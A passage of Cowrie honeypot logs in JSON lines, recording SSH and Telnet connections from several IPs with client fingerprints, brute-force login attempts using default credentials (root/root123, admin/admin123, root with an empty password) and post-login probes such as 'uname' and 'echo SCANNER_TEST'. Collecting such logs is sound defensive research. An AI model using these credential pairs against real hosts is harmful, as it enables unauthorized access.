com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:20:31.318546Z","src_ip":"185.93.89.7","session":"6dd01095aeb5"}
{"eventid":"cowrie.login.failed","username":"index","password":"asdf1234","message":"login attempt [index/asdf1234] failed","sensor":"my-vps","timestamp":"2025-08-28T09:20:31.356982Z","src_ip":"185.93.89.7","session":"6dd01095aeb5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:20:32.384763Z","src_ip":"185.93.89.7","session":"6dd01095aeb5"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":51434,"dst_ip":"1.2.3.4","dst_port":22,"session":"584d6c36e3f8","protocol":"ssh","message":"New connection: 51.79.164.132:51434 (1.2.3.4:22) [session: 584d6c36e3f8]","sensor":"my-vps","timestamp":"2025-08-28T09:20:38.500083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:20:38.598426Z","src_ip":"51.79.164.132","session":"584d6c36e3f8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:20:39.066810Z","src_ip":"51.79.164.132","session":"584d6c36e3f8"}
{"eventid":"cowrie.session.closed","duration":13.643162488937378,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:20:39.701887Z","src_ip":"184.22.103.96","session":"27d9c9278e61"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:20:40.283646Z","src_ip":"51.79.164.132","session":"584d6c36e3f8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:20:40.675596Z","src_ip":"51.79.164.132","session":"584d6c36e3f8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:20:40.676370Z","src_ip":"51.79.164.132","session":"584d6c36e3f8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:20:41.125488Z","src_ip":"51.79.164.132","session":"584d6c36e3f8"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:20:41.126539Z","src_ip":"51.79.164.132","session":"584d6c36e3f8"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":41578,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bfc6f9a6de1","protocol":"ssh","message":"New connection: 185.93.89.7:41578 (1.2.3.4:22) [session: 0bfc6f9a6de1]","sensor":"my-vps","timestamp":"2025-08-28T09:20:56.368040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:20:56.369195Z","src_ip":"185.93.89.7","session":"0bfc6f9a6de1"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:20:56.387181Z","src_ip":"185.93.89.7","session":"0bfc6f9a6de1"}
{"eventid":"cowrie.login.failed","username":"index","password":"1q2w3e","message":"login attempt [index/1q2w3e] failed","sensor":"my-vps","timestamp":"2025-08-28T09:20:56.424718Z","src_ip":"185.93.89.7","session":"0bfc6f9a6de1"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:20:57.498925Z","src_ip":"185.93.89.7","session":"0bfc6f9a6de1"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":44402,"dst_ip":"1.2.3.4","dst_port":22,"session":"19d478f40f40","protocol":"ssh","message":"New connection: 51.79.164.132:44402 (1.2.3.4:22) [session: 19d478f40f40]","sensor":"my-vps","timestamp":"2025-08-28T09:21:05.042096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:21:05.179664Z","src_ip":"51.79.164.132","session":"19d478f40f40"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:21:05.735310Z","src_ip":"51.79.164.132","session":"19d478f40f40"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:21:06.977607Z","src_ip":"51.79.164.132","session":"19d478f40f40"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:21:08.530366Z","src_ip":"51.79.164.132","session":"19d478f40f40"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":38930,"dst_ip":"1.2.3.4","dst_port":22,"session":"0daeba262863","protocol":"ssh","message":"New connection: 185.93.89.7:38930 (1.2.3.4:22) [session: 0daeba262863]","sensor":"my-vps","timestamp":"2025-08-28T09:21:21.077943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:21:21.078885Z","src_ip":"185.93.89.7","session":"0daeba262863"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:21:21.098005Z","src_ip":"185.93.89.7","session":"0daeba262863"}
{"eventid":"cowrie.login.failed","username":"index","password":"1234qwer","message":"login attempt [index/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-28T09:21:21.141964Z","src_ip":"185.93.89.7","session":"0daeba262863"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:21:22.257384Z","src_ip":"185.93.89.7","session":"0daeba262863"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":56302,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2bb9472658d","protocol":"ssh","message":"New connection: 51.79.164.132:56302 (1.2.3.4:22) [session: b2bb9472658d]","sensor":"my-vps","timestamp":"2025-08-28T09:21:31.669418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:21:31.774070Z","src_ip":"51.79.164.132","session":"b2bb9472658d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:21:32.189629Z","src_ip":"51.79.164.132","session":"b2bb9472658d"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-28T09:21:33.706269Z","src_ip":"51.79.164.132","session":"b2bb9472658d"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:21:35.306754Z","src_ip":"51.79.164.132","session":"b2bb9472658d"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":42732,"dst_ip":"1.2.3.4","dst_port":22,"session":"2822360695e9","protocol":"ssh","message":"New connection: 185.93.89.7:42732 (1.2.3.4:22) [session: 2822360695e9]","sensor":"my-vps","timestamp":"2025-08-28T09:21:45.290012Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:21:45.294885Z","src_ip":"185.93.89.7","session":"2822360695e9"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:21:45.323644Z","src_ip":"185.93.89.7","session":"2822360695e9"}
{"eventid":"cowrie.login.failed","username":"index","password":"qwertyuiop","message":"login attempt [index/qwertyuiop] failed","sensor":"my-vps","timestamp":"2025-08-28T09:21:45.375636Z","src_ip":"185.93.89.7","session":"2822360695e9"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:21:46.395191Z","src_ip":"185.93.89.7","session":"2822360695e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47083,"dst_ip":"1.2.3.4","dst_port":23,"session":"cd5ecbb5efb7","protocol":"telnet","message":"New connection: 212.227.235.229:47083 (1.2.3.4:23) [session: cd5ecbb5efb7]","sensor":"my-vps","timestamp":"2025-08-28T09:21:47.641158Z"}
{"eventid":"cowrie.session.connect","src_ip":"165.227.142.245","src_port":52428,"dst_ip":"1.2.3.4","dst_port":23,"session":"7d38ca340749","protocol":"telnet","message":"New connection: 165.227.142.245:52428 (1.2.3.4:23) [session: 7d38ca340749]","sensor":"my-vps","timestamp":"2025-08-28T09:21:48.308674Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T09:21:48.388918Z","src_ip":"165.227.142.245","session":"7d38ca340749"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T09:21:49.502847Z","src_ip":"165.227.142.245","session":"7d38ca340749"}
{"eventid":"cowrie.session.closed","duration":2.317298412322998,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:21:50.625906Z","src_ip":"165.227.142.245","session":"7d38ca340749"}
{"eventid":"cowrie.session.connect","src_ip":"165.227.142.245","src_port":52434,"dst_ip":"1.2.3.4","dst_port":23,"session":"fd891afa6d74","protocol":"telnet","message":"New connection: 165.227.142.245:52434 (1.2.3.4:23) [session: fd891afa6d74]","sensor":"my-vps","timestamp":"2025-08-28T09:21:50.635880Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:21:50.711801Z","src_ip":"165.227.142.245","session":"fd891afa6d74"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:21:50.727437Z","src_ip":"165.227.142.245","session":"fd891afa6d74"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T09:21:50.787737Z","src_ip":"165.227.142.245","session":"fd891afa6d74"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.7","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:21:52.390941Z","src_ip":"165.227.142.245","session":"fd891afa6d74"}
{"eventid":"cowrie.session.closed","duration":1.7580339908599854,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:21:52.393861Z","src_ip":"165.227.142.245","session":"fd891afa6d74"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":38256,"dst_ip":"1.2.3.4","dst_port":22,"session":"b150960d6b71","protocol":"ssh","message":"New connection: 51.79.164.132:38256 (1.2.3.4:22) [session: b150960d6b71]","sensor":"my-vps","timestamp":"2025-08-28T09:21:57.975252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:21:58.335339Z","src_ip":"51.79.164.132","session":"b150960d6b71"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:21:58.336032Z","src_ip":"51.79.164.132","session":"b150960d6b71"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123456","message":"login attempt [centos/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:22:00.571520Z","src_ip":"51.79.164.132","session":"b150960d6b71"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:22:02.063355Z","src_ip":"51.79.164.132","session":"b150960d6b71"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":50882,"dst_ip":"1.2.3.4","dst_port":22,"session":"83036f705104","protocol":"ssh","message":"New connection: 185.93.89.7:50882 (1.2.3.4:22) [session: 83036f705104]","sensor":"my-vps","timestamp":"2025-08-28T09:22:09.584211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:22:09.595014Z","src_ip":"185.93.89.7","session":"83036f705104"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp